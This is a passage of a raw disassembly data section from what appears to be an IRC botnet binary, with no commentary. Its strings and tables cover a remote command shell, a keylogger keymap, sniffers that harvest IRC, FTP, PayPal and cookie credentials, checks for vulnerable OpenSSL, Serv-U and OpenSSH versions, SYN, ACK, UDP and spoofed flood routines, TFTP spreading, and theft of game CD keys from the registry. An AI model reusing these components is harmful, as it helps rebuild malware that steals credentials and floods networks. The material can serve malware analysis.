unk_44B408 db 2Dh ; - ; DATA XREF: sub_411725+AF�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExecut db '- Failed to execute shell.',0
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_41181E+8C�o
align 4
unk_44B438 db 2Dh ; - ; DATA XREF: sub_41181E+C3�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExec_0 db '- Failed to execute shell, error: <%d>.',0
align 10h
unk_44B470 db 2Dh ; - ; DATA XREF: sub_4118F7+8D�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aSessionreadshe db '- SessionReadShellThread exited, error: <%ld>.',0
align 10h
dword_44B4B0 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411AAE+A8�o
aServerStarte_5 db '- Server started on: %s:%d.',0
dword_44B4D8 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411AAE+114�o
aClientConnec_3 db '- Client connection from IP: %s:%d, Server thread: %d.',0
align 4
dword_44B51C dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411AAE+17C�o
aFailedToSta_42 db '- Failed to start client thread, error: <%d>.',0
align 4
dword_44B558 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411AAE+1B1�o
aFailedToSta_43 db '- Failed to start server on Port %d.',0
align 4
dword_44B58C dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411CB2+F2�o
aAuthentication db '- Authentication failed. Remote userid: %s != %s.',0
align 4
dword_44B5CC dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411CB2+18A�o
aErrorFailedToO db '- Error: Failed to open socket(), returned: <%d>.',0
align 10h
dword_44B610 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411CB2+1F9�o
aErrorFailedToC db '- Error: Failed to connect to target, returned: <%d>.',0
align 4
aRb_0 db 'rb',0 ; DATA XREF: sub_41206F+130�o
align 4
aTftpTransferSt db 'Tftp transfer started to: %s',0 ; DATA XREF: sub_41206F+2CD�o
align 4
aTftpTransferCo db 'Tftp transfer complete to: %s',0 ; DATA XREF: sub_41206F+3BE�o
align 4
dword_44B698 dd 4000500h, 7868746Bh, 2 dup(0) ; DATA XREF: sub_41206F+416�o
dd 8
dword_44B6AC dd 62h, 62000000h, 2 dup(0) ; DATA XREF: sub_4125C5:loc_4126A8�o
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_44BDDC dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_4125C5+2AA�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_44BE14 dd 5Ch ; DATA XREF: sub_4124E6+2C�o
dword_44BE18 dd 6261h ; DATA XREF: sub_4124E6+4E�o
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_4124E6+86�o
align 4
dword_44BE38 dd 234032Dh, 6C79656Bh, 302676Fh, 7325202Dh, 0 ; DATA XREF: sub_4124E6+AC�o
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_4125C5+8F�o
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_4125C5+1D9�o
align 10h
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_4125C5+21C�o
align 8
aBot db 'BOT',0 ; DATA XREF: _2:off_44BEAC�o
off_44BE9C dd offset loc_435240+9 ; DATA XREF: _2:0044BEB0�o
off_44BEA0 dd offset loc_505442+4 ; DATA XREF: _2:0044BEB4�o
aHttp_0 db 'HTTP',0 ; DATA XREF: _2:0044BEB8�o
align 4
off_44BEAC dd offset aBot ; DATA XREF: sub_41289A+2B5�r
; "BOT"
dd offset off_44BE9C
dd offset off_44BEA0
dd offset aHttp_0 ; "HTTP"
align 10h
dword_44BEC0 dd 6F6C2E3Ah, 6E6967h, 3 dup(0) ; DATA XREF: sub_41289A+1DE�o
dword_44BED4 dd 0 ; DATA XREF: sub_41289A+2AE�r
dd 6F6C2C3Ah, 6E6967h, 4 dup(0)
dd 6F6C213Ah, 6E6967h, 4 dup(0)
dd 6F6C403Ah, 6E6967h, 4 dup(0)
dd 6F6C243Ah, 6E6967h, 4 dup(0)
dd 6F6C253Ah, 6E6967h, 4 dup(0)
dd 6F6C5E3Ah, 6E6967h, 4 dup(0)
dd 6F6C263Ah, 6E6967h, 4 dup(0)
dd 6F6C2A3Ah, 6E6967h, 4 dup(0)
dd 6F6C2D3Ah, 6E6967h, 4 dup(0)
dd 6F6C2B3Ah, 6E6967h, 4 dup(0)
dd 6F6C2F3Ah, 6E6967h, 4 dup(0)
dd 6F6C5C3Ah, 6E6967h, 4 dup(0)
dd 6F6C3D3Ah, 6E6967h, 4 dup(0)
dd 6F6C3F3Ah, 6E6967h, 4 dup(0)
dd 6F6C273Ah, 6E6967h, 4 dup(0)
dd 6F6C603Ah, 6E6967h, 4 dup(0)
dd 6F6C7E3Ah, 6E6967h, 4 dup(0)
dd 6F6C203Ah, 6E6967h, 4 dup(0)
dd 75612E3Ah, 6874h, 4 dup(0)
dd 75612C3Ah, 6874h, 4 dup(0)
dd 7561213Ah, 6874h, 4 dup(0)
dd 7561403Ah, 6874h, 4 dup(0)
dd 7561243Ah, 6874h, 4 dup(0)
dd 7561253Ah, 6874h, 4 dup(0)
dd 75615E3Ah, 6874h, 4 dup(0)
dd 7561263Ah, 6874h, 4 dup(0)
dd 75612A3Ah, 6874h, 4 dup(0)
dd 75612D3Ah, 6874h, 4 dup(0)
dd 75612B3Ah, 6874h, 4 dup(0)
dd 75612F3Ah, 6874h, 4 dup(0)
dd 75615C3Ah, 6874h, 4 dup(0)
dd 75613D3Ah, 6874h, 4 dup(0)
dd 75613F3Ah, 6874h, 4 dup(0)
dd 7561273Ah, 6874h, 4 dup(0)
dd 7561603Ah, 6874h, 4 dup(0)
dd 75617E3Ah, 6874h, 4 dup(0)
dd 7561203Ah, 6874h, 4 dup(0)
dd 64692E3Ah, 5 dup(0)
dd 64692C3Ah, 5 dup(0)
dd 6469213Ah, 5 dup(0)
dd 6469403Ah, 5 dup(0)
dd 6469243Ah, 5 dup(0)
dd 6469253Ah, 5 dup(0)
dd 64695E3Ah, 5 dup(0)
dd 6469263Ah, 5 dup(0)
dd 64692A3Ah, 5 dup(0)
dd 64692D3Ah, 5 dup(0)
dd 64692B3Ah, 5 dup(0)
dd 64692F3Ah, 5 dup(0)
dd 64695C3Ah, 5 dup(0)
dd 64693D3Ah, 5 dup(0)
dd 64693F3Ah, 5 dup(0)
dd 6469273Ah, 5 dup(0)
dd 6469603Ah, 5 dup(0)
dd 64697E3Ah, 5 dup(0)
dd 6469203Ah, 5 dup(0)
dd 61682E3Ah, 6E696873h, 4 dup(0)
dd 6168213Ah, 6E696873h, 4 dup(0)
dd 6168243Ah, 6E696873h, 4 dup(0)
dd 6168253Ah, 6E696873h, 4 dup(0)
dd 65732E3Ah, 65727563h, 4 dup(0)
dd 6573213Ah, 65727563h, 4 dup(0)
dd 6C2E3Ah, 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
dd 79732E3Ah, 6Eh, 4 dup(0)
dd 7973213Ah, 6Eh, 4 dup(0)
dd 7973243Ah, 6Eh, 4 dup(0)
dd 7973253Ah, 6Eh, 4 dup(0)
dd 4B444320h, 207965h, 4 dup(0)
dd 4E494F4Ah, 2320h, 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
dword_44C718 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_41289A+85�o
aSocketFailedRe db '- socket() failed, returned %d',0
align 4
dword_44C744 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_41289A+103�o
aBindFailedRetu db '- bind() failed, returned %d',0
align 10h
dword_44C770 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_41289A+186�o
aWsaioctlFailed db '- WSAIoctl() failed, returned %d',0
align 10h
aPsniff_0 db '[PSNIFF]',0 ; DATA XREF: sub_41289A+236�o
align 4
dword_44C7AC dd 234032Dh, 696E7370h, 3026666h, 2Dh ; DATA XREF: sub_41289A+24D�o
dword_44C7BC dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_41289A+2C2�o
aSuspiciousSPac db '- suspicious %s packet from: %s:%d - %s',0
dword_44C7F0 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_41289A+313�o
aRecvFailedRetu db '- recv() failed, returned %d',0
align 4
aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_412C1F+5�o
align 4
aPsniff_1 db '[PSNIFF]:',0 ; DATA XREF: sub_412C1F+2B�o
align 4
aPsniff_2 db 'PSNIFF//',0 ; DATA XREF: sub_412C1F+3C�o
align 10h
aJoin_1 db 'JOIN #',0 ; DATA XREF: sub_412C1F+4D�o
align 4
a302_0 db '302 ',0 ; DATA XREF: sub_412C1F:loc_412C81�o
align 10h
a366 db '366 ',0 ; DATA XREF: sub_412C1F+73�o
align 4
a_login db ':.login',0 ; DATA XREF: sub_412C1F+84�o
aLogin_1 db ':!login',0 ; DATA XREF: sub_412C1F+95�o
aLogin_2 db ':!Login',0 ; DATA XREF: sub_412C1F+A6�o
a_login_0 db ':.Login',0 ; DATA XREF: sub_412C1F+B7�o
a_ident db ':.ident',0 ; DATA XREF: sub_412C1F+C8�o
aIdent_0 db ':!ident',0 ; DATA XREF: sub_412C1F+D9�o
a_hashin db ':.hashin',0 ; DATA XREF: sub_412C1F+EE�o
align 4
aHashin db ':!hashin',0 ; DATA XREF: sub_412C1F+103�o
align 10h
aIrcSniff db 'IRC sniff',0 ; DATA XREF: sub_412D36+5�o
align 4
aOper db 'OPER ',0 ; DATA XREF: sub_412D36+2B�o
align 4
aNick_3 db 'NICK ',0 ; DATA XREF: sub_412D36:loc_412D76�o
align 4
aOper_0 db 'oper ',0 ; DATA XREF: sub_412D36+51�o
align 4
aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_412D36+62�o
aFtpSniff db 'FTP sniff',0 ; DATA XREF: sub_412DAC+5�o
align 4
aNick_2 db 'NICK ',0 ; DATA XREF: sub_412DAC+2B�o
align 4
a220 db '220 ',0 ; DATA XREF: sub_412DAC+3C�o
align 4
a230 db '230 ',0 ; DATA XREF: sub_412DAC:loc_412DFD�o
align 4
aUser_2 db 'USER ',0 ; DATA XREF: sub_412DAC+62�o
align 4
aPass_0 db 'PASS ',0 ; DATA XREF: sub_412DAC+73�o
align 4
aHttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_412E33+5�o
align 10h
aPaypal db 'paypal',0 ; DATA XREF: sub_412E33+2B�o
align 4
aPaypal_0 db 'PAYPAL',0 ; DATA XREF: sub_412E33:loc_412E73�o
align 10h
aPaypal_com db 'PAYPAL.COM',0 ; DATA XREF: sub_412E33+51�o
align 4
aPaypal_com_0 db 'paypal.com',0 ; DATA XREF: sub_412E33+62�o
align 4
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: sub_412E33+73�o
aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_412EBA+5�o
align 10h
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_412EBA+2B�o
align 10h
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_412EBA:loc_412EFA�o
align 4
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_412EBA+51�o
align 10h
unk_44C990 db 2Dh ; - ; DATA XREF: sub_412F1F+C5�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBindFailedRe_0 db '- bind() failed, returned %d',0
align 4
unk_44C9BC db 2Dh ; - ; DATA XREF: sub_412F1F+14B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aWsaioctlFail_0 db '- WSAIoctl() failed, returned %d',0
align 4
aS_27 db '%s',0 ; DATA XREF: sub_412F1F+22F�o
align 10h
aS_28 db '%s',0 ; DATA XREF: sub_412F1F+253�o
align 4
unk_44C9F4 db 2Dh ; - ; DATA XREF: sub_412F1F+2DC�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBotSniffSDToSD db '- Bot sniff "%s:%d" to "%s:%d": - "%s"',0
unk_44CA28 db 2Dh ; - ; DATA XREF: sub_412F1F+30B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aIrcSniffSDToSD db '- IRC sniff "%s:%d" to "%s:%d": - "%s"',0
unk_44CA5C db 2Dh ; - ; DATA XREF: sub_412F1F+337�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFtpSniffSDToSD db '- FTP sniff "%s:%d" to "%s:%d": - "%s"',0
unk_44CA90 db 2Dh ; - ; DATA XREF: sub_412F1F+36A�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aHttpSniffSDToS db '- HTTP sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_44CAC8 db 2Dh ; - ; DATA XREF: sub_412F1F+3D6�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVulnSniffSDToS db '- VULN sniff "%s:%d" to "%s:%d": - "%s"',0
align 10h
unk_44CB00 db 2Dh ; - ; DATA XREF: sub_4132FC+5B�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aDoneWithFloodA db 'done with flood at %iKB/sec',0
aDdos_syn_0 db 'ddos.syn',0 ; DATA XREF: sub_4133AE+F1�o
align 4
aDdos_ack_0 db 'ddos.ack',0 ; DATA XREF: sub_4133AE:loc_4134BE�o
align 10h
aDdos_random_0 db 'ddos.random',0 ; DATA XREF: sub_4133AE:loc_4134DA�o
dword_44CB4C dd 234032Dh, 736F6464h, 202D0302h, 646E6573h, 72726520h
; DATA XREF: sub_4133AE+31A�o
dd 203A726Fh, 6425h
unk_44CB68 db 2Dh ; - ; DATA XREF: sub_413740+49�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSocketFailed_0 db 'socket() failed, returned %d',0
align 4
unk_44CB94 db 2Dh ; - ; DATA XREF: sub_413740+C2�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSetsockoptFail db 'setsockopt() failed, returned %d',0
align 4
unk_44CBC4 db 2Dh ; - ; DATA XREF: sub_413740+12A�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidTargetI db 'invalid target ip',0
align 8
unk_44CBE8 db 2Dh ; - ; DATA XREF: sub_413740+326�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aDoneWithSFlood db 'done with %s flood to %s. sent %d packets @ %dKB/sec (%dMB).',0
align 8
unk_44CC38 db 2Dh ; - ; DATA XREF: sub_413740+390�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aErrorSendingPa db 'error sending packets to %s. %d packets sent, returned %d',0
align 10h
unk_44CC80 db 2Dh ; - ; DATA XREF: sub_413B2B+6E�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aErrorSendingPi db 'error sending pings to %s',0
align 4
unk_44CCA8 db 2Dh ; - ; DATA XREF: sub_413B2B+13C�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFinishedSendin db 'finished sending pings to %s',0
align 4
unk_44CCD4 db 2Dh ; - ; DATA XREF: sub_413CB7+8E�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aErrorSending_0 db '- error sending packets to %s',0
align 4
unk_44CCFC db 2Dh ; - ; DATA XREF: sub_413CB7+1C7�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFinishedSend_0 db '- finished sending packets to %s',0
align 4
dword_44CD28 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_413ECE+48�o
aDoneWithFloodI db '- Done with flood (%iKB/sec)',0
align 4
unk_44CD54 db 2Dh ; - ; DATA XREF: sub_414067+48�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aDoneWithFloo_0 db '- Done with flood (%iKB/sec).',0
align 4
unk_44CD7C db 2Dh ; - ; DATA XREF: sub_414103+295�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aSendErrorD_ db '- Send error: <%d>.',0
align 4
dword_44CD9C dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_41440C+4D�o
aDoneWithFlood_ db '- Done with flood.',0
align 10h
unk_44CDC0 db 2Dh ; - ; DATA XREF: sub_4146C8+70�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSocketFai db '- Error: socket() failed, returned: <%d>.',0
align 4
unk_44CDF4 db 2Dh ; - ; DATA XREF: sub_4146C8+EE�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSetsockop db '- Error: setsockopt() failed, returned: <%d>.',0
align 4
unk_44CE2C db 2Dh ; - ; DATA XREF: sub_4146C8+15F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidTarge_0 db '- Invalid target IP.',0
align 4
aSyn_1 db 'syn',0 ; DATA XREF: sub_4146C8+2BD�o
aAck_0 db 'ack',0 ; DATA XREF: sub_4146C8+2DD�o
aRandom_2 db 'random',0 ; DATA XREF: sub_4146C8+2FD�o
align 10h
unk_44CE60 db 2Dh ; - ; DATA XREF: sub_4146C8+471�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aDoneWithSFlo_0 db '- Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 10h
unk_44CEB0 db 2Dh ; - ; DATA XREF: sub_4146C8+4E4�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSending_1 db '- Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 10h
unk_44CF00 db 2Dh ; - ; DATA XREF: sub_414C64+60�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aDoneWithFloodD db '- Done with flood, %d packets sent.',0
align 4
aD_D_D_D_1 db '%d.%d.%d.%d',0 ; DATA XREF: sub_414D19+C8�o
unk_44CF40 db 2Dh ; - ; DATA XREF: sub_414F53+47�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aStartingWisdom db '- Starting Wisdom spoofed UDP flood thread.',0
align 10h
unk_44CF80 db 2Dh ; - ; DATA XREF: sub_414FC9+2A�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSo db '- Error calling socket().',0
align 10h
unk_44CFB0 db 2Dh ; - ; DATA XREF: sub_414FC9+63�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSe db '- Error calling setsockopt(). WSAGetLastError() returns %d.',0
align 10h
unk_44D000 db 2Dh ; - ; DATA XREF: sub_414FC9+80�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aInvalidTarge_1 db '- Invalid target IP. WSAGetLastError() returns %d.',0
unk_44D044 db 2Dh ; - ; DATA XREF: sub_414FC9+CC�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aSendingPackets db '- Sending packets to %s...',0
aD_D_D_D_2 db '%d.%d.%d.%d',0 ; DATA XREF: sub_414FC9+17E�o
align 10h
unk_44D080 db 2Dh ; - ; DATA XREF: sub_414FC9+2F6�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFinishedSend_1 db '- Finished sending packets to %s. Sent %d packet(s). ~%dMB of dat'
db 'a sent (~%dK/s).',0
align 8
unk_44D0E8 db 2Dh ; - ; DATA XREF: sub_414FC9+348�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorSending_2 db '- Error sending packets to %s. eax=SOCKET_ERROR, WSAGetLastError('
db ')=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
unk_44D174 db 2Dh ; - ; DATA XREF: sub_415321+5D�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aDoneWithFloodP db 'Done with flood, ports hit: %s',0
align 10h
asc_44D1A0: ; DATA XREF: sub_4154BB+1C0�o
unicode 0, < >,0
aSD_2 db '%s%d ',0 ; DATA XREF: sub_4154BB+1FE�o
align 4
dword_44D1AC dd 234032Dh, 61696C61h, 696C2073h, 3027473h, 2Dh ; DATA XREF: sub_4159C4+10�o
dword_44D1C0 dd 202E6425h, 73253403h, 203D2003h, 73253703h, 3 ; DATA XREF: sub_4159C4+35�o
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_415A3C+60�o
align 4
dword_44D1F8 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: _0:00415AF8�o
dword_44D204 dd 234032Dh, 2676F6Ch, 63202D03h, 7261656Ch, 6465h
; DATA XREF: sub_415B79+20�o
dword_44D218 dd 234032Dh, 3676F6Ch, 43202D02h, 7261656Ch, 2E6465h
; DATA XREF: sub_415B79:loc_415BAE�o
dword_44D22C dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 72617473h
; DATA XREF: sub_415BEC+3F�o
dd 676E6974h, 0
dword_44D248 dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 706D6F63h
; DATA XREF: sub_415BEC+DC�o
dd 6574656Ch, 0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_415D1B+11�o
aWindow db 'Window',0 ; DATA XREF: sub_415F56+23�o
align 4
aWindow_0 db 'Window',0 ; DATA XREF: sub_41614F+26�o
align 10h
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: _2:off_44E134�o
align 4
aCdkey db 'CDKey',0 ; DATA XREF: _2:0044E138�o
align 10h
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: _2:0044E13C�o
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 10h
aRegnumber db 'RegNumber',0
align 4
